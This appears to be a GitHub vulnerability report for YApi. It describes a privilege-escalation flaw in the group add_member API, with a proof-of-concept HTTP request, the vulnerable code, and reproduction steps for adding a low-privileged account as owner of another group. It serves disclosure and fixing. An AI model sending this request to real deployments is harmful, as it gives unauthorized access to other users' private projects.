Privilege Escalation Vulnerability in API Allows Unauthorized Addition to Projects with Highest Permissions #2790
Description
Description
When a developer creates a private project, the content of the project should be inaccessible to unauthorized users. However, a vulnerability exists in the API that allows unauthorized users to add themselves to other projects with the highest level of permissions.
Proof of Concept (PoC):
POST /api/group/add_member HTTP/1.1
Host: target
Content-Type: application/json
Cookie: _yapi_uid=<LOW_PRIV_UID>; _yapi_token=<LOW_PRIV_JWT>
{
"id": <TARGET_GROUP_ID>,
"member_uids": [<LOW_PRIV_UID>],
"role": "owner"
}Vulnerable Code
async addMember(ctx) {
let params = ctx.params;
let groupInst = yapi.getInst(groupModel);
params.role = ['owner', 'dev', 'guest'].find(v => v === params.role) || 'dev';
let add_members = [];
...
let userdata = await this.getUserdata(id, params.role);
...
userdata.role !== 'admin' && add_members.push(userdata);Reproduction Steps
First, we confirm that the project currently has no permissions.
Using a POC, add your own account as the Group Owner.
Refresh the page, and the project can now be operated normally.
